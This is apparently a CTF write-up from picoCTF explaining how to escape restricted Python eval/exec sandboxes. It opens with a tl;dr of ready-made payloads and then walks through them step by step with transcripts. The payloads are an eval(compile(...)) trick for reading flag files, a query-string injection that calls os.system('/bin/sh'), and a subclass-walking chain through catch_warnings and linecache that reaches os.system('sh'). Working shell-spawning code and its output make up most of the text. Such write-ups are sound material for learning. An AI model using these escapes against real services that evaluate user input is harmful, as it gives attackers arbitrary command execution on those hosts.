Escaping the Python Sandbox

(ROP, Overflow, format 2, mildly evil, more evilbroken cbcevergreen (2), black hole, broken rsa, chromatophoria(2), harder serialrobomunication)

tl;dr

eval(compile('print key', '<stdin>', 'exec'))

GET /index.html?a="}+eval("__import__('os').system('/bin/sh')")+{"
__builtins__['ww']=().__class__.__base__
__builtins__['w']=ww.__subclasses__()
__builtins__['y']=w[53].__enter__.__func__
__builtins__['a']=y.__globals__['linecache']
__builtins__['os']=a.checkcache.__globals__['os']
os.system('cat *')
().__class__.__base__`.__subclasses__()[53].__enter__.__func__.__globals__['linecache'].checkcache.__globals__['os'].system('sh')

This post is a write up of how I solved the python problems from picoCTF. Basically the problems consist of a piece of python code, which takes user input, and then eval's it. Eval then allows us to get a shell. Lets explore.

     # example1.py
     x = input("enter something to eval:\n")
     print "x:",x

This is python2.7, which means that the proper way to get input is with "raw_input". The issue with "input" is that it eval's the string. That means we can do things like this:

    enter something to eval:
     2*100
     x: 200

But if we try to do something like this:

     enter something to eval:
     print "hello world"
     Traceback (most recent call last):
      File "pytest.py", line 2, in <module>
       x = input("enter something to eval:\n")
      File "<string>", line 1
       print "hello world"
         ^
     SyntaxError: invalid syntax

We get an error. This is because eval evaluates an expression. However we can get around this limitation by running some special code:

eval(compile('print "hello world"', '<stdin>', 'exec'))

Which looks like this:

    def listFiles(a, dir, files):
       print files
     path.walk(".", listFiles, None)

And then we put it in our special method:

eval(compile('def listFiles(a, dir, files):\n\tprint files\npath.walk(".",listFiles,None)', '<stdin>', 'exec'))

And look! (we get an error) but it lists all of the files in the directory (specifically 'yourflaghere'). Lets read that file.

eval(compile('print open("your_flag_here").read()', '<stdin>', 'exec'))

Ok, that solves python 3. Python 4 is a fair bit easier. Since we get the 'import' function, all we need is to get an eval on "__import__('os').system('/bin/sh')" and we're good to go. After a bit of research on Query Strings, we get this:

GET /index.html?a="}+eval("__import__('os').system('/bin/sh')")+{"

Cool, now onto the harder python 5 (this one was by far the most fun). Here is the source:

     #!/usr/bin/python -u
     # task5.py
     from sys import modules
     modules.clear()
     del modules
     _raw_input = raw_input
     _BaseException = BaseException
     _EOFError = EOFError
     __builtins__.__dict__.clear()
     __builtins__ = None
     print 'Get a shell, if you can...'
     while 1:
      try:
       d = {'x':None}
       exec 'x='+_raw_input()[:50] in d
       print 'Return Value:', d['x']
      except _EOFError, e:
       raise e
      except _BaseException, e:
       print 'Exception:', e

The answer to this is the second chunk of code in the tl;dr at the top, but I'm going to explain how I got there. The first thing I did was look up to documentation for exec. Then I went to see what kinds of things I had access to.

     Get a shell, if you can...
     print "a"
     Exception: invalid syntax (<string>, line 1)
     eval("2+2")
     Exception: name 'eval' is not defined
     x
     Return Value: None
     x.__class__
     Return Value: <type 'NoneType'>
     __builtins__
     Return Value: {}
     y
     Exception: name 'y' is not defined
     __builtins__['y']=1337
     Return Value: 1337
     y
     Return Value: 1337

Cool, I can get around the 50 character limit by setting values to __builtins__. Lets dig deeper into that x.__class__ (I didn't get there as quickly as below, but you get the idea. Just use __base__, __bases__, __class__, __mro__, __subclasses__ etc - read this):

     x.__class__
     Return Value: <type 'NoneType'>
     x.__class__.__base__
     Return Value: <type 'object'>
     x.__class__.__base__.__subclasses__
     Return Value: <built-in method __subclasses__ of type object at 0x88cd40>
     x.__class__.__base__.__subclasses__()
     Return Value: [<type 'type'>, <type 'weakref'>, <type 'weakcallableproxy'>, <type 'weakproxy'>,...

Ok, I have a long list of values there, but now I have to find out if I can use them to get a shell. Some special values I noticed were: <type 'file'><type 'module'>, <type 'zipimport.zipimporter'>. Lets look at file first:

     #setup variable 'w' to access the values
     __builtins__['ww']=().__class__.__base__
     __builtins__['w']=ww.__subclasses__()
     # file
     w[40]
     # open a file
     w[40]('/etc/hosts').read()
     # write to a file
     w[40]('test','w').write('test string')
     Exception: [Errno 13] Permission denied: 'test'
     # lets try somewhere else
     w[40]('/tmp/test','w').write('test string')
     # read it back
     w[40]('/tmp/test').read()

Cool. Too bad we don't know the name of the key file (otherwise we could just read it in). Lets look at <module> next:

     w[47]
     Return Value: <type 'module'>
     w[47]('os')
     Return Value: <module 'os' (built-in)>
     w[47]('os').system
     Exception: 'module' object has no attribute 'system'

Yeah, I tried for a long time, but couldn't get it to create a useful object. Lets move on to zipimporter. It looks like we should be able to read in a zip file containing a python module. The next step is figuring out how to get a zip onto the server. Remember that we can write arbitrary files to /tmp, and that python can write arbitrary bytes in strings with its escape sequence. This means we can do this:

     #the zip file in hex
     50 4b 03 04 14 03 00 00 08 00 ce ad a4 42 5e 13 60 d0 22 00 00 00 23 00 00 00 04 00 00 00 7a 2e 70 79 cb cc 2d c8 2f 2a 51 c8 2f e6 2a 28 ca cc 03 31 f4 8a 2b 8b 4b 52 73 35 d4 93 13 4b 14 b4 d4 35 b9 00 50 4b 01 02 3f 03 14 03 00 00 08 00 ce ad a4 42 5e 13 60 d0 22 00 00 00 23 00 00 00 04 00 00 00 00 00 00 00 00 00 20 80 a4 81 00 00 00 00 7a 2e 70 79 50 4b 05 06 00 00 00 00 01 00 01 00 32 00 00 00 44 00 00 00 00 00
     #save it to strings in 7 byte chuks
     __builtins__['a']='\x50\x4b\x03\x04\x14\x03\x00'
     __builtins__['b']='\x00\x08\x00\xce\xad\xa4\x42'
     ...
     __builtins__['t']='\x00\x44\x00\x00\x00\x00\x00'
     __builtins__['u']=a+b+c+d+e+f+g+h+i+j+k+l+m+n+o
     __builtins__['v']=u+p+q+r+s+t
     #write it to a file
     w[40]('/tmp/z','wb').write(v)
     #now lets load it in
     w[49]
     Return Value: <type 'zipimport.zipimporter'>
     #and....
     w[49]('/tmp/z').load_module('z')
     Exception: can't decompress data; zlib not available

That last part... after all that work... made me... sad. Very sad.

But I had to move on, and get past the fact that they COMPILED PYTHON WITHOUT ZLIB. Next, I tried to just overwrite their file with my own:

     w[40]('task5.py','w').write('z')
     Exception: [Errno 13] Permission denied: 'task5.py'

No luck. I then googled around and found this page. The main post seemed like it could work, but was too complicated for me to fully grasp (and also there's a 50 character limit per entry, so it would take forever to input it). What interested me more was the comment:

TL;DR

     __builtins__=([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__)
     import sys; print open(sys.argv[0]).read()

Hey, I can do that!

     # the class
     w[53]
     Return Value: <class 'warnings.catch_warnings'>
     #and.....
     w[53]()._module.__builtins__
     Exception: 'warnings'

Nope. Not today. So I kept looking (I was going though the modules by hand for a while, but no luck) Then I found this script. Huh, that looks interesting. Lets run it on my machine (after reading the source).

    ...
    Examining codecs.IncrementalEncoder
     Looks like codecs.IncrementalEncoder.__init__.__func__.__globals__['__builtins__'] might be builtins
     Examining codecs.IncrementalEncoder()
    ...

Well, as it turns out, those are false positives (they return the local broken __builtins__). I added this to the searching script to have it find less false positives:

     from sys import modules
     modules.clear()
     del modules

Now the results are less, but still quite numerous. Based on the information previously learned from this guy, I realized that the key was to get into an objects __enter__. Scrolling though the indices  we see that warnings.catch_warnings (previously caused an exception) can be accessed through its __enter__ param (without invoking it). This looks quite promising, and using one of the strings from the search, we get this:

     # target, with 50 character max per line
     # warnings.catch_warnings.__enter__.__func__.__globals__['linecache'].checkcache.__globals__['os']
     w[53]
     Return Value: <class 'warnings.catch_warnings'>
     __builtins__['y']=w[53].__enter__.__func__
     Return Value: <function __enter__ at 0x7fdf74cfe1b8>
     y
     Return Value: <function __enter__ at 0x7fdf74cfe1b8>
     __builtins__['a']=y.__globals__['linecache']
     Return Value: <module 'linecache' from '/usr/lib/python2.7/linecache.pyc'>
     __builtins__['os']=a.checkcache.__globals__['os']
     Return Value: <module 'os' from '/usr/lib/python2.7/os.pyc'>
     os.system('sh')

Thank you sir, may I have another?